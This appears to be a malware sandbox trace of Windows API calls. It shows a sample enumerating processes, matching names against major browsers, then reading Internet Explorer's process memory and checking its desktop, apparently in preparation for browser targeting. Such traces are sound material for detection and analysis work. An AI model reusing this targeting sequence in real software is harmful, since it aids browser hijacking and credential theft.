	[0225.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0225.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5c9c
	[0225.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.524] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.524] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.524] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.525] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0225.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5ca0
	[0225.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0225.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.526] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0225.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.527] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5ca4
	[0225.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.528] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.528] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.529] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.529] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0225.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5ca8
	[0225.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.531] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0225.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.531] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.532] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0225.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.532] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0225.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5cac
	[0225.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.533] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0225.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.534] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.534] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0225.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.534] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0225.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5cb0
	[0225.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.535] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0225.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.536] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.536] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0225.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.536] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0225.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5cb4
	[0225.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.537] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0225.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.537] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.538] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0225.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.538] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0225.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0225.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0225.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5cb8
	[0225.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.540] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0225.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.541] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.541] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0225.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.542] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0225.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5cbc
	[0225.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.543] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0225.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.543] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.544] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0225.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.544] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0225.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5cc0
	[0225.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.545] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0225.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.545] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.546] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0225.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.546] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0225.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5cc4
	[0225.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.547] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0225.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0225.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0225.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5cc8
	[0225.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.550] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0225.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.550] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0225.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.552] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0225.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5ccc
	[0225.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.552] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0225.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.553] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.553] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0225.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.553] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0225.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5cd0
	[0225.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.554] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0225.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.555] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.555] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0225.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.556] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0225.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5cd4
	[0225.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.557] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0225.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.557] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0225.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0225.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5cd8
	[0225.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.559] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0225.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.560] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.560] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0225.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.560] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0225.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5cdc
	[0225.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.597] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0225.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.597] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.597] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0225.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.598] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.598] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0225.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5ce0
	[0225.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.599] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0225.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.599] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.600] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0225.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.600] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.600] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0225.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5ce4
	[0225.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.601] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0225.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.602] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.603] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0225.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.603] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.604] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0225.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5ce8
	[0225.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.604] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0225.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.605] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.605] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0225.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.606] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0225.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5cec
	[0225.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.607] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0225.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.608] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.608] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0225.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.609] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0225.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5cf0
	[0225.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.610] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0225.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.611] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.612] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0225.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.612] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.612] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5cf4
	[0225.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.613] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.614] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.614] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.614] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.614] NtQueryInformationProcess (in: ProcessHandle=0x5cf4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.614] ReadProcessMemory (in: hProcess=0x5cf4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.615] ReadProcessMemory (in: hProcess=0x5cf4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0225.615] ReadProcessMemory (in: hProcess=0x5cf4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.615] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
